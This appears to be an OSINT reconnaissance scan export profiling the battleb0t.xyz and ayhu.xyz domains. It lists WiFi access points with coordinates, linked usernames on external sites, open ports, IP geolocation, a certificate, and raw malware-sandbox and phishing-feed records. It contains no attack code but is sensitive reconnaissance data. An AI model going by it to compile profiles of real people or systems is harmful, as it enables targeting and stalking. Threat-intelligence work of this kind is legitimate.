| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FD:64:31) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | curealty (Net ID: 00:0C:41:49:32:21) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:56:23 | Netblock Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 46.101.128.0/17 | 46.101.229.70 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.178): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:57 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00xkhaled.github.io | 185.199.111.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PanPanLePanda (Net ID: 00:00:00:00:27:69) | 52.3759, 4.8975 |
| 2023-05-12 02:49:57 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 11, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'VM-65119321.html', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.22.59.100:443"\n "185.199.110.153:443"\n "13.227.74.65:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6900:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6900:120:WilError_01"\n "Local\\SM0:6900:120:WilError_01"\n "Local\\SM0:6900:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6436:304:WilStaging_02"\n "Local\\SM0:6436:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7504:304:WilStaging_02"\n "Local\\SM0:7504:304:WilStaging_02"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\000003.log]- [targetUID: 00000000-00006900]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00006900]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00006900]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.json]- [targetUID: 00000000-00006900]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00006900]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00006900]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Site Characteristics Database\\LOG]- [targetUID: 00000000-00006900]\n "473aeb8b-5a6c-41f3-8963-14113874f676.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\473aeb8b-5a6c-41f3-8963-14113874f676.tmp]- [targetUID: 00000000-00006900]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.fingerprint]- [targetUID: 00000000-00006900]\n "Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00006900]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\crl-set]- [targetUID: 00000000-00006900]\n "be201c28-8966-423a-a934-6abe0eafb4e2.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 92181"- Location: [%TEMP%\\be201c28-8966-423a-a934-6abe0eafb4e2.tmp]- [targetUID: 00000000-00006900]\n "e843645f-3bd1-42de-964b-e44c1b3d4c5b.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e843645f-3bd1-42de-964b-e44c1b3d4c5b.tmp]- [targetUID: 00000000-00006900]\n "f6a4f247dbf4d697c26b375e3580d6053baf25f5.tbres" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\TokenBroker\\Cache\\f6a4f247dbf4d697c26b375e3580d6053baf25f5.tbres]- [targetUID: 00000000-00006900]\n "9284637b-d0b5-41c3-b074-3e6b43678760.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\9284637b-d0b5-41c3-b074-3e6b43678760.tmp]- [targetUID: 00000000-00006900]\n "dcbb5e88-4a52-456a-b7b5-cd4372e7b57e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\dcbb5e88-4a52-456a-b7b5-cd4372e7b57e.tmp]- [targetUID: 00000000-00006900]\n "History-journal" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\History-journal]- [targetUID: 00000000-00006900]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 104.22.59.100 on port 443"\n "HTTPS traffic to 185.199.110.153 on port 443"\n "HTTPS traffic to 13.227.74.65 on port 443"\n "HTTPS traffic to 149.154.167.220 on port 443"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "XqYi\',\'GOqYh\',\'gISTU\',\'n()\\x20\',\'roJBb\',\'FXzcw\',\'__pro\',\'warn\',\'PukFk\',\'EAlzP\',\'YvMmB\',\'iiLHY\',\'tQrEe\',\'mGJfV\',\'strin\',\'pbBLV\',\'KlDNI\',\'nbsJn\',\'kVpKR\',\'BiHjg\',\'FNmxz\',\'sWuxZ\',\'ZOmpK\',\'om%2f\',\'FpgMT\',\'sjuIm\',\'style\',\'round\',\'EuVvW\',\'Qydgv\',\'serve\',\'oLeTO\',\'"\n Heuristic match: "api.telegram.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'11/60 Antivirus vendors marked sample as malicious (18% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-3', u'name': u'Sample was identified as malicious by a large number of Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'11/60 Antivirus vendors marked sample as malicious (18% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': 102435, u'job_id': u'63ee0a00ee7f7e33101b746d', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 2, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_ident | 185.199.110.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 7722 4671 (Net ID: 00:00:C5:FD:29:7C) | 41.8781, -87.6298 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | F3 (Category: social)
https://f3.cool/ayhu | ayhu |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Hubski (Category: social)
https://hubski.com/user/login | login |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.128): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:47:51 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 50, u'search_terms': [{u'id': u'host', u'value': u'185.199.110.153'}], u'result': [{u'environment_id': 160, u'job_id': u'645bd5b4c91b05fb4e09d1bc', u'analysis_start_time': u'2023-05-10 17:34:45', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'1eb54c8f8f093a5ed9d95a558ef3fba4478e0871baaaf09ed172f5a7e87a5b10', u'type': None, u'type_short': u'url', u'size': 43}, {u'environment_id': 160, u'job_id': u'645b7f631bddd658890d6f1f', u'analysis_start_time': u'2023-05-10 11:26:28', u'vx_family': None, u'av_detect': u'50', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'51c964dcceaa18cc88e308f2cdc2406b1d03555f03ddf2c95d28291be51ffade', u'type': None, u'type_short': u'url', u'size': 111}, {u'environment_id': 110, u'job_id': u'6455d656527d443ed60aa508', u'analysis_start_time': u'2023-05-06 04:23:51', u'vx_family': u'Phishing site', u'av_detect': u'58', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'b3c4f32bf311d95e65bd4f2f6ce93af614d560856d9425d0d4a555d75c3e9579', u'type': None, u'type_short': u'url', u'size': 59}, {u'environment_id': 160, u'job_id': u'64555682531d0684ae04bdd2', u'analysis_start_time': u'2023-05-05 19:18:27', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'bd60f020d50337e4d722a114e201e48bc6525e5b2e9c2b98216b38b585d8d843', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 160, u'job_id': u'64536cad0d5627815a06f833', u'analysis_start_time': u'2023-05-04 08:28:30', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f6b87534e4ad728b3efdf794897f8badfaa12c074108bc1dc415c6a8c05a5221', u'type': None, u'type_short': u'url', u'size': 95}, {u'environment_id': 100, u'job_id': u'64515b3668c0c3e0390a7e86', u'analysis_start_time': u'2023-05-02 18:49:26', u'vx_family': u'Phishing site', u'av_detect': u'36', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'2f982f44961fc1f13e578da0cabe68a008733609fa9f04594128957a099ceed5', u'type': None, u'type_short': u'url', u'size': 97}, {u'environment_id': 110, u'job_id': u'64503df63e303ab74b0b9546', u'analysis_start_time': u'2023-05-01 22:32:22', u'vx_family': u'Win/grayware_confidence_60%', u'av_detect': u'21', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'Yuzu Updater.exe', u'sha256': u'3fba8f17cfa66d0984dd5016c50e2b7f323a37f213a8c67f04c27d3be67dc77a', u'type': None, u'type_short': u'.NET exe', u'size': 102912}, {u'environment_id': 110, u'job_id': u'6449b9efc9475afa460684b1', u'analysis_start_time': u'2023-04-26 23:55:27', u'vx_family': u'Phishing site', u'av_detect': u'75', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'd4ecb5317b76cb50a2b081868ed27de654816aac4a50cf4f4b2ff50f3c12e98c', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 160, u'job_id': u'64490622595e26aaf70214c8', u'analysis_start_time': u'2023-04-26 11:08:19', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'0a8afa66a1f5a82193119c2336e31a594ba3098af7be2e4047d2e04beb5850d0', u'type': None, u'type_short': u'url', u'size': 444}, {u'environment_id': 110, u'job_id': u'6442db2eed6efbd2240f3754', u'analysis_start_time': u'2023-04-21 18:51:26', u'vx_family': u'Phishing site', u'av_detect': u'10', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'c476745cfb34866457803744a7898a71b4ea6fc620fac85ffed040d7012cb4b7', u'type': None, u'type_short': u'url', u'size': 48}, {u'environment_id': 110, u'job_id': u'643ddc4b41506c15bd0f0380', u'analysis_start_time': u'2023-04-17 23:54:52', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'cdea7744dbe76157c42918ca828871e1a1bc1e70b6cf161b54d04d946a300ca1', u'type': None, u'type_short': u'url', u'size': 64}, {u'environment_id': 110, u'job_id': u'643dda626eb15b91290fc514', u'analysis_start_time': u'2023-04-17 23:46:43', u'vx_family': None, u'av_detect': u'58', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'757fbd83c6b388685a77cdc9ebef01ecd96b3f02ad51cce5b704ff32e567de84', u'type': None, u'type_short': u'url', u'size': 60}, {u'environment_id': 110, u'job_id': u'643dda57f1d6c20c6901299f', u'analysis_start_time': u'2023-04-17 23:46:32', u'vx_family': None, u'av_detect': u'57', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'0636e0ae6696317893450396f0e7cc0c18fa85bf9428fcb5e30532541214906a', u'type': None, u'type_short': u'url', u'size': 76}, {u'environment_id': 160, u'job_id': u'64324ea527cf82106202bff7', u'analysis_start_time': u'2023-04-09 05:35:33', u'vx_family': u'Malicious site', u'av_detect': u'22', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'300e105cc83e64e1de3d1f59c835690b2605f445eaea4ac7eb06fa649d3cba32', u'type': None, u'type_short': u'url', u'size': 43}, {u'environment_id': 160, u'job_id': u'64303fbfcea4bd4a8f06a8f8', u'analysis_start_time': u'2023-04-07 16:07:27', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'c31707db3b8ad0e4c22e4c74983a89fc94d4cf95bcfafd48023deca7764128f0', u'type': None, u'type_short': u'url', u'size': 130}, {u'environment_id': 160, u'job_id': u'642f06b5743086351900d2a6', u'analysis_start_time': u'2023-04-06 17:51:49', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'c0cfc842ccbaa88ea6b6ae6bb9c24b87ca2e271b77c5350b7ee575b465019227', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 100, u'job_id': u'642ea6c82e1849181405e516', u'analysis_start_time': u'2023-04-06 11:02:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'171a6a53761331f106ebd53de3264163d02ef248497d89bdaa19f070dadf82a8', u'type': None, u'type_short': u'url', u'size': 715}, {u'environment_id': 100, u'job_id': u'642c5f7e039e817b2b0749ab', u'analysis_start_time': u'2023-04-04 17:33:51', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 39, u'verdict': u'suspicious', u'submit_name': u'scale.com', u'sha256': u'bff47563d9a757224cda0a4c90c7cc681d80107efa48891bdc347b062c44c0f5', u'type': None, u'type_short': u'html', u'size': 141092}, {u'environment_id': 100, u'job_id': u'6427fd961f3f69ddbc0f9850', u'analysis_start_time': u'2023-04-01 09:47:03', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'877994c44f4f4b595fa650e1283efc786926c41b3a6af7fab62341b06a505a8e', u'type': None, u'type_short': u'url', u'size': 48}, {u'environment_id': 100, u'job_id': u'64246f1544fc23cd26095e6d', u'analysis_start_time': u'2023-03-29 17:02:14', u'vx_family': None, u'av_detect': u'33', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'3a72dd9862ff6d683301cce0cc36e72efb438d09893b8d9841a45a255e5f03c8', u'type': None, u'type_short': u'url', u'size': 50}, {u'environment_id': 100, u'job_id': u'64234220a560e4f7280e8a00', u'analysis_start_time': u'2023-03-28 19:38:09', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f84ebc72ffe159736478a6aedbe614098803356f6b69d19905bfc8de69549128', u'type': None, u'type_short': u'url', u'size': 55}, {u'environment_id': 160, u'job_id': u'642262aa36c72290dd02ee4c', u'analysis_start_time': u'2023-03-28 03:44:43', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no verdict', u'submit_name': u'sample.url', u'sha256': u'14983e1667a00bda888756ec7ecf76fd29bb61ffb73d1ec8cf5669c6ee1258a4', u'type': None, u'type_short': u'url', u'size': 46}, {u'environment_id': 160, u'job_id': u'64200f6b03a47f3dff0fc492', u'analysis_start_time': u'2023-03-26 09:25:00', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'bbbceecc03231c0a6894d0366668ac0e4a0c84e8a2c04c6c0e01b3aa07d45ee7', u'type': None, u'type_short': u'url', u'size': 188}, {u'environment_id': 160, u'job_id': u'641d3af9995a9d9f980a0bd1', u'analysis_start_time': u'2023-03-24 05:54:02', u'vx_family': u'suspicious.low.ml', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspi | 185.199.110.153 |
| 2023-05-12 02:45:32 | Raw Data from RIRs | No | PhishStats | 0 | 0 | 2 | 0 | None | [{u'page_text': u' ', u'domain': None, u'virus_total': None, u'n_times_seen_ip': None, u'abuse_contact': None, u'ip': u'185.199.108.153', u'google_safebrowsing': None, u'threat_crowd': None, u'n_times_seen_domain': None, u'alexa_rank_host': None, u'id': 2237961, u'city': u'', u'abuse_ch_malware': None, u'countrycode': u'NL', u'title': u'Site not found \xb7 GitHub Pages', u'ssl_subject': None, u'technology': None, u'date_update': u'2020-12-08T01:50:24.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': None, u'vulns': None, u'latitude': u'52', u'regionname': u'', u'hash': u'6f8f0cfa616f90e680c4136030ab5e5904d3331895ffcc4f8c615128545a0da4', u'threat_crowd_subdomain_count': None, u'screenshot': None, u'n_times_seen_host': None, u'ssl_issuer': None, u'domain_registered_n_days_ago': None, u'regioncode': u'', u'host': u'swary.github.io', u'date': u'2018-05-25T15:15:02.000Z', u'asn': u'AS54113', u'tags': None, u'bgp': u'185.199.108.0/22', u'url': u'https://swary.github.io/wservvpro/', u'isp': u'FASTLY - Fastly, US', u'longitude': u'4.89950000', u'ports': None, u'countryname': u'Netherlands', u'threat_crowd_votes': None, u'http_server': None, u'tld': u'io', u'os': None, u'http_code': None}] | 185.199.108.153 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Trello (Category: social)
https://trello.com/_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:2D:BB:B4) | 34.0544, -118.244 |
| 2023-05-12 03:01:30 | Web Technology | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | HTML5 | nuke.battleb0t.xyz |
| 2023-05-12 02:50:44 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:03:e6:77:f0:fb:1d:de:0e:93:d2:d9:e5:40:98:fb:b1:42
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Nov 17 08:07:50 2022 GMT
Not After : Feb 15 08:07:49 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:b1:ca:c5:7f:45:88:ea:f6:98:9e:7e:93:33:29:
bd:74:fc:48:fe:29:e9:2a:62:8c:97:f1:93:16:6f:
19:da:24:7c:94:17:6e:35:5b:b2:ef:eb:77:ee:6f:
68:a3:10:bb:0d:f6:01:57:78:db:8f:85:23:65:1b:
8d:5a:d8:02:5e
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
26:F8:75:40:42:15:34:A1:4E:96:C0:96:27:7F:34:DA:52:69:CF:39
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:64:02:30:30:65:da:98:dc:09:a7:4c:e4:33:3c:8a:ff:b4:
b6:a4:7c:dd:85:ba:d7:a9:30:8d:0e:63:cf:13:17:15:57:f9:
3b:12:68:dc:4b:97:91:0c:68:5e:6b:01:4b:4a:0f:a7:02:30:
78:5a:55:48:6e:2f:4f:60:b1:ea:bf:ab:1e:2c:b1:95:69:ea:
9d:d3:dc:5e:73:96:b4:1e:5a:b2:fd:e0:bd:42:cc:83:a6:42:
5c:5a:f3:1b:e0:65:96:82:07:eb:9c:bc
| battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0036labs.github.io | 185.199.111.153 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | GitHub (Category: coding)
https://github.com/Battleb0t | Battleb0t |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:64:E2:6A) | 50.1188, 8.6843 |
| 2023-05-12 02:44:05 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | None None | ayhu.xyz |
| 2023-05-12 02:53:32 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.111.153:443 | 185.199.111.153 |
| 2023-05-12 03:12:58 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 2 | 0 | None | OpenPhish [github.io]
https://www.openphish.com/feed.txt | github.io |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | DPRWirelessScottsdale (Net ID: 00:02:6F:FD:3F:B2) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:07 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | Fastly | battleb0t.xyz |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:2095 | 87.248.157.102 |
| 2023-05-12 03:16:26 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'16', u'country_tld': u'.tr', u'ip': u'87.248.157.102', u'currency_name': u'Lira', u'currency': u'TRY', u'country_population': 82319724, u'country_code': u'TR', u'timezone': u'Europe/Istanbul', u'city': u'Bursa', u'network': u'87.248.157.0/24', u'languages': u'tr-TR,ku,diq,az,av', u'version': u'IPv4', u'latitude': 40.2024, u'in_eu': False, u'utc_offset': u'+0300', u'continent_code': u'AS', u'country_name': u'Turkey', u'country_capital': u'Ankara', u'org': u'Dgn Teknoloji A.s.', u'postal': u'16350', u'asn': u'AS43260', u'country': u'TR', u'region': u'Bursa', u'longitude': 29.0398, u'country_calling_code': u'+90', u'country_area': 780580.0, u'country_code_iso3': u'TUR'} | 87.248.157.102 |
| 2023-05-12 02:44:18 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | 185.199.110.153 |
| 2023-05-12 03:01:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.110.133:443 | 185.199.110.0/24 |
